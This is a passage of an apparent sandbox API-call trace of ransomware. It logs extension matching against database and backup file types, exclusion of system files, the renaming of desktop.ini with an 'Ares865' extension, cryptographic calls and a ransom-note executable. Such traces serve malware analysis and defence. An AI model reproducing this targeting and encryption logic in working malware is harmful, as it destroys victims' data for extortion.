returned 3 [0065.265] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0065.265] lstrlenW (lpString="mdb") returned 3 [0065.265] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0065.265] lstrlenW (lpString="sql") returned 3 [0065.265] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0065.265] lstrlenW (lpString="sqlite") returned 6 [0065.265] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0065.265] lstrlenW (lpString="sqlite3") returned 7 [0065.265] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0065.265] lstrlenW (lpString="sqlitedb") returned 8 [0065.265] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0065.265] lstrlenW (lpString="xml") returned 3 [0065.265] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0065.266] lstrlenW (lpString="$er") returned 3 [0065.266] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0065.266] lstrlenW (lpString="4dd") returned 3 [0065.266] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0065.266] lstrlenW (lpString="4dl") returned 3 [0065.266] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0065.266] lstrlenW (lpString="^^^") returned 3 [0065.266] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0065.266] lstrlenW (lpString="abs") returned 3 [0065.266] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0065.266] lstrlenW (lpString="abx") returned 3 [0065.266] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0065.266] lstrlenW (lpString="accdb") returned 5 [0065.266] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0065.266] lstrlenW (lpString="accdc") returned 5 [0065.266] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0065.266] lstrlenW (lpString="accde") returned 5 [0065.266] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0065.266] lstrlenW (lpString="accdr") returned 5 [0065.266] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0065.266] lstrlenW (lpString="accdt") returned 5 [0065.266] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0065.266] lstrlenW (lpString="accdw") returned 5 [0065.266] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0065.266] lstrlenW (lpString="accft") returned 5 [0065.266] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0065.266] lstrlenW (lpString="adb") returned 3 [0065.266] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0065.266] lstrlenW (lpString="adb") returned 3 [0065.266] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0065.266] lstrlenW (lpString="ade") returned 3 [0065.266] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0065.266] lstrlenW (lpString="adf") returned 3 [0065.266] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0065.266] lstrlenW (lpString="adn") returned 3 [0065.266] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0065.267] lstrlenW (lpString="adp") returned 3 [0065.267] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0065.267] lstrlenW (lpString="alf") returned 3 [0065.267] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0065.267] lstrlenW (lpString="ask") returned 3 [0065.267] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0065.267] lstrlenW (lpString="btr") returned 3 [0065.267] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0065.267] lstrlenW (lpString="cat") returned 3 [0065.267] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0065.267] lstrlenW (lpString="cdb") returned 3 [0065.267] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0065.267] lstrlenW (lpString="ckp") returned 3 [0065.267] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0065.267] lstrlenW (lpString="cma") returned 3 [0065.267] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0065.267] lstrlenW (lpString="cpd") returned 3 [0065.267] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0065.267] lstrlenW (lpString="dacpac") returned 6 [0065.267] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0065.267] lstrlenW (lpString="dad") returned 3 [0065.267] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0065.267] lstrlenW (lpString="dadiagrams") returned 10 [0065.267] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0065.267] lstrlenW (lpString="daschema") returned 8 [0065.267] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0065.267] lstrlenW (lpString="db-journal") returned 10 [0065.267] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0065.267] lstrlenW (lpString="db-shm") returned 6 [0065.267] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0065.267] lstrlenW (lpString="db-wal") returned 6 [0065.267] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0065.267] lstrlenW (lpString="dbc") returned 3 [0065.267] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0065.267] lstrlenW (lpString="dbs") returned 3 [0065.267] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0065.268] lstrlenW (lpString="dbt") returned 3 [0065.268] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0065.268] lstrlenW (lpString="dbv") returned 3 [0065.268] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0065.268] lstrlenW (lpString="dbx") returned 3 [0065.268] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0065.268] lstrlenW (lpString="dcb") returned 3 [0065.268] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0065.268] lstrlenW (lpString="dct") returned 3 [0065.268] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0065.268] lstrlenW (lpString="dcx") returned 3 [0065.268] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0065.268] lstrlenW (lpString="ddl") returned 3 [0065.268] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0065.268] lstrlenW (lpString="dlis") returned 4 [0065.268] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0065.268] lstrlenW (lpString="dp1") returned 3 [0065.268] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0065.268] lstrlenW (lpString="dqy") returned 3 [0065.268] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0065.268] lstrlenW (lpString="dsk") returned 3 [0065.268] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0065.268] lstrlenW (lpString="dsn") returned 3 [0065.268] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0065.268] lstrlenW (lpString="dtsx") returned 4 [0065.268] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0065.268] lstrlenW (lpString="dxl") returned 3 [0065.268] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0065.268] lstrlenW (lpString="eco") returned 3 [0065.269] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0065.269] lstrlenW (lpString="ecx") returned 3 [0065.269] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0065.269] lstrlenW (lpString="edb") returned 3 [0065.269] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0065.269] lstrlenW (lpString="epim") returned 4 [0065.269] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0065.269] lstrlenW (lpString="fcd") returned 3 [0065.269] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0065.269] lstrlenW (lpString="fdb") returned 3 [0065.269] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0065.269] lstrlenW (lpString="fic") returned 3 [0065.269] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0065.269] lstrlenW (lpString="flexolibrary") returned 12 [0065.269] lstrlenW (lpString="fm5") returned 3 [0065.269] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0065.269] lstrlenW (lpString="fmp") returned 3 [0065.269] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0065.269] lstrlenW (lpString="fmp12") returned 5 [0065.269] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0065.269] lstrlenW (lpString="fmpsl") returned 5 [0065.269] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0065.269] lstrlenW (lpString="fol") returned 3 [0065.269] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0065.269] lstrlenW (lpString="fp3") returned 3 [0065.269] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0065.269] lstrlenW (lpString="fp4") returned 3 [0065.269] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0065.269] lstrlenW (lpString="fp5") returned 3 [0065.269] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0065.269] lstrlenW (lpString="fp7") returned 3 [0065.269] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0065.269] lstrlenW (lpString="fpt") returned 3 [0065.269] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0065.269] lstrlenW (lpString="frm") returned 3 [0065.269] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0065.270] lstrlenW (lpString="gdb") returned 3 [0065.270] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0065.270] lstrlenW (lpString="gdb") returned 3 [0065.270] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0065.270] lstrlenW (lpString="grdb") returned 4 [0065.270] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0065.270] lstrlenW (lpString="gwi") returned 3 [0065.270] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0065.270] lstrlenW (lpString="hdb") returned 3 [0065.270] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0065.270] lstrlenW (lpString="his") returned 3 [0065.270] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0065.270] lstrlenW (lpString="ib") returned 2 [0065.270] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0065.270] lstrlenW (lpString="idb") returned 3 [0065.270] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0065.270] lstrlenW (lpString="ihx") returned 3 [0065.270] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0065.270] lstrlenW (lpString="itdb") returned 4 [0065.270] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0065.270] lstrlenW (lpString="itw") returned 3 [0065.270] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0065.270] lstrlenW (lpString="jet") returned 3 [0065.270] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0065.270] lstrlenW (lpString="jtx") returned 3 [0065.270] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0065.270] lstrlenW (lpString="kdb") returned 3 [0065.270] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0065.270] lstrlenW (lpString="kexi") returned 4 [0065.270] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0065.270] lstrlenW (lpString="kexic") returned 5 [0065.270] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0065.270] lstrlenW (lpString="kexis") returned 5 [0065.270] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0065.270] lstrlenW (lpString="lgc") returned 3 [0065.270] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0065.271] lstrlenW (lpString="lwx") returned 3 [0065.271] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0065.271] lstrlenW (lpString="maf") returned 3 [0065.271] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0065.271] lstrlenW (lpString="maq") returned 3 [0065.271] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0065.271] lstrlenW (lpString="mar") returned 3 [0065.271] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0065.271] lstrlenW (lpString="marshal") returned 7 [0065.271] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0065.271] lstrlenW (lpString="mas") returned 3 [0065.271] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0065.271] lstrlenW (lpString="mav") returned 3 [0065.271] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0065.271] lstrlenW (lpString="maw") returned 3 [0065.271] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0065.271] lstrlenW (lpString="mdbhtml") returned 7 [0065.271] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0065.271] lstrlenW (lpString="mdn") returned 3 [0065.271] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0065.271] lstrlenW (lpString="mdt") returned 3 [0065.271] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0065.271] lstrlenW (lpString="mfd") returned 3 [0065.271] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0065.271] lstrlenW (lpString="mpd") returned 3 [0065.271] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0065.271] lstrlenW (lpString="mrg") returned 3 [0065.271] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0065.271] lstrlenW (lpString="mud") returned 3 [0065.271] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0065.271] lstrlenW (lpString="mwb") returned 3 [0065.271] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0065.271] lstrlenW (lpString="myd") returned 3 [0065.271] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0065.271] lstrlenW (lpString="ndf") returned 3 [0065.271] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0065.272] lstrlenW (lpString="nnt") returned 3 [0065.272] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0065.272] lstrlenW (lpString="nrmlib") returned 6 [0065.272] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0065.272] lstrlenW (lpString="ns2") returned 3 [0065.272] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0065.272] lstrlenW (lpString="ns3") returned 3 [0065.272] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0065.272] lstrlenW (lpString="ns4") returned 3 [0065.272] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0065.272] lstrlenW (lpString="nsf") returned 3 [0065.272] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0065.272] lstrlenW (lpString="nv") returned 2 [0065.272] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0065.272] lstrlenW (lpString="nv2") returned 3 [0065.272] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0065.272] lstrlenW (lpString="nwdb") returned 4 [0065.272] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0065.272] lstrlenW (lpString="nyf") returned 3 [0065.272] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0065.272] lstrlenW (lpString="odb") returned 3 [0065.272] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0065.272] lstrlenW (lpString="odb") returned 3 [0065.272] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0065.272] lstrlenW (lpString="oqy") returned 3 [0065.272] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0065.272] lstrlenW (lpString="ora") returned 3 [0065.272] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0065.272] lstrlenW (lpString="orx") returned 3 [0065.272] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0065.272] lstrlenW (lpString="owc") returned 3 [0065.272] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0065.272] lstrlenW (lpString="p96") returned 3 [0065.272] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0065.272] lstrlenW (lpString="p97") returned 3 [0065.272] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0065.272] lstrlenW (lpString="pan") returned 3 [0065.273] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0065.273] lstrlenW (lpString="pdb") returned 3 [0065.273] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0065.273] lstrlenW (lpString="pdm") returned 3 [0065.273] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0065.273] lstrlenW (lpString="pnz") returned 3 [0065.273] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0065.273] lstrlenW (lpString="qry") returned 3 [0065.273] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0065.273] lstrlenW (lpString="qvd") returned 3 [0065.273] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0065.273] lstrlenW (lpString="rbf") returned 3 [0065.273] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0065.273] lstrlenW (lpString="rctd") returned 4 [0065.273] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0065.273] lstrlenW (lpString="rod") returned 3 [0065.273] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0065.273] lstrlenW (lpString="rodx") returned 4 [0065.273] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0065.273] lstrlenW (lpString="rpd") returned 3 [0065.273] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0065.273] lstrlenW (lpString="rsd") returned 3 [0065.273] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0065.273] lstrlenW (lpString="sas7bdat") returned 8 [0065.273] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0065.273] lstrlenW (lpString="sbf") returned 3 [0065.273] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0065.273] lstrlenW (lpString="scx") returned 3 [0065.273] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0065.273] lstrlenW (lpString="sdb") returned 3 [0065.273] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0065.273] lstrlenW (lpString="sdc") returned 3 [0065.273] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0065.273] lstrlenW (lpString="sdf") returned 3 [0065.273] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0065.273] lstrlenW (lpString="sis") returned 3 [0065.273] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0065.273] lstrlenW (lpString="spq") returned 3 [0065.274] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0065.274] lstrlenW (lpString="te") returned 2 [0065.274] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0065.274] lstrlenW (lpString="teacher") returned 7 [0065.274] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0065.274] lstrlenW (lpString="tmd") returned 3 [0065.274] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0065.274] lstrlenW (lpString="tps") returned 3 [0065.274] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0065.274] lstrlenW (lpString="trc") returned 3 [0065.274] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0065.274] lstrlenW (lpString="trc") returned 3 [0065.274] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0065.274] lstrlenW (lpString="trm") returned 3 [0065.274] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0065.274] lstrlenW (lpString="udb") returned 3 [0065.274] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0065.274] lstrlenW (lpString="udl") returned 3 [0065.274] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0065.274] lstrlenW (lpString="usr") returned 3 [0065.274] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0065.274] lstrlenW (lpString="v12") returned 3 [0065.274] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0065.274] lstrlenW (lpString="vis") returned 3 [0065.274] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0065.274] lstrlenW (lpString="vpd") returned 3 [0065.274] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0065.274] lstrlenW (lpString="vvv") returned 3 [0065.274] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0065.274] lstrlenW (lpString="wdb") returned 3 [0065.274] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0065.274] lstrlenW (lpString="wmdb") returned 4 [0065.274] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0065.274] lstrlenW (lpString="wrk") returned 3 [0065.274] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0065.274] lstrlenW (lpString="xdb") returned 3 [0065.275] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0065.275] lstrlenW (lpString="xld") returned 3 [0065.275] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0065.275] lstrlenW (lpString="xmlff") returned 5 [0065.275] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0065.275] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\desktop.ini.Ares865") returned 78 [0065.275] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\desktop.ini" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0065.276] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.276] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67) returned 1 [0065.276] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.276] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0065.276] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.276] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0065.277] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0065.277] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.277] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x118 [0065.279] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0065.280] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0065.281] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0065.281] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.281] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d32b0 [0065.281] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d32b0 | out: hHeap=0x2b0000) returned 1 [0065.281] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0065.281] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0065.281] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0065.281] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0065.281] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0065.281] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0065.281] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0065.281] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0065.281] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0065.281] CloseHandle (hObject=0x118) returned 1 [0065.281] CloseHandle (hObject=0x164) returned 1 [0065.282] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0065.282] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0065.282] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0065.282] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4abba5a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4abba5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0065.282] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0065.282] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x668c5a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa9d0d0, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0065.282] lstrcmpiW (lpString1="index.dat", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0065.282] lstrcmpiW (lpString1="index.dat", lpString2="aoldtz.exe") returned 1 [0065.282] lstrcmpiW (lpString1="index.dat", lpString2=".") returned 1 [0065.282] lstrcmpiW (lpString1="index.dat", lpString2="..") returned 1 [0065.282] lstrcmpiW (lpString1="index.dat", lpString2="windows") returned -1 [0065.282] lstrcmpiW (lpString1="index.dat", lpString2="bootmgr") returned 1 [0065.282] lstrcmpiW (lpString1="index.dat", lpString2="temp") returned -1 [0065.282] lstrcmpiW (lpString1="index.dat", lpString2="pagefile.sys") returned -1 [0065.282] lstrcmpiW (lpString1="index.dat", lpString2="boot") returned 1 [0065.282] lstrcmpiW (lpString1="index.dat", lpString2="ids.txt") returned 1 [0065.282] lstrcmpiW (lpString1="index.dat", lpString2="ntuser.dat") returned -1 [0065.282] lstrcmpiW (lpString1="index.dat", lpString2="perflogs") returned -1 [0065.282] lstrcmpiW (lpString1="index.dat", lpString2="MSBuild") returned -1 [0065.282] lstrlenW (lpString="index.dat") returned 9 [0065.282] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\desktop.ini") returned 70 [0065.282] lstrcpyW (in: lpString1=0x2cce476, lpString2="index.dat" | out: lpString1="index.dat") returned="index.dat" [0065.282] lstrlenW (lpString="index.dat") returned 9 [0065.282] lstrlenW (lpString="Ares865") returned 7 [0065.282] lstrcmpiW (lpString1="dex.dat", lpString2="Ares865") returned 1 [0065.282] lstrlenW (lpString=".dll") returned 4 [0065.282] lstrcmpiW (lpString1="index.dat", lpString2=".dll") returned 1 [0065.283] lstrlenW (lpString=".lnk") returned 4 [0065.283] lstrcmpiW (lpString1="index.dat", lpString2=".lnk") returned 1 [0065.283] lstrlenW (lpString=".ini") returned 4 [0065.283] lstrcmpiW (lpString1="index.dat", lpString2=".ini") returned 1 [0065.283] lstrlenW (lpString=".sys") returned 4 [0065.283] lstrcmpiW (lpString1="index.dat", lpString2=".sys") returned 1 [0065.283] lstrlenW (lpString="index.dat") returned 9 [0065.283] lstrlenW (lpString="bak") returned 3 [0065.283] lstrcmpiW (lpString1="dat", lpString2="bak") returned 1 [0065.283] lstrlenW (lpString="ba_") returned 3 [0065.283] lstrcmpiW (lpString1="dat", lpString2="ba_") returned 1 [0065.283] lstrlenW (lpString="dbb") returned 3 [0065.283] lstrcmpiW (lpString1="dat", lpString2="dbb") returned -1 [0065.283] lstrlenW (lpString="vmdk") returned 4 [0065.283] 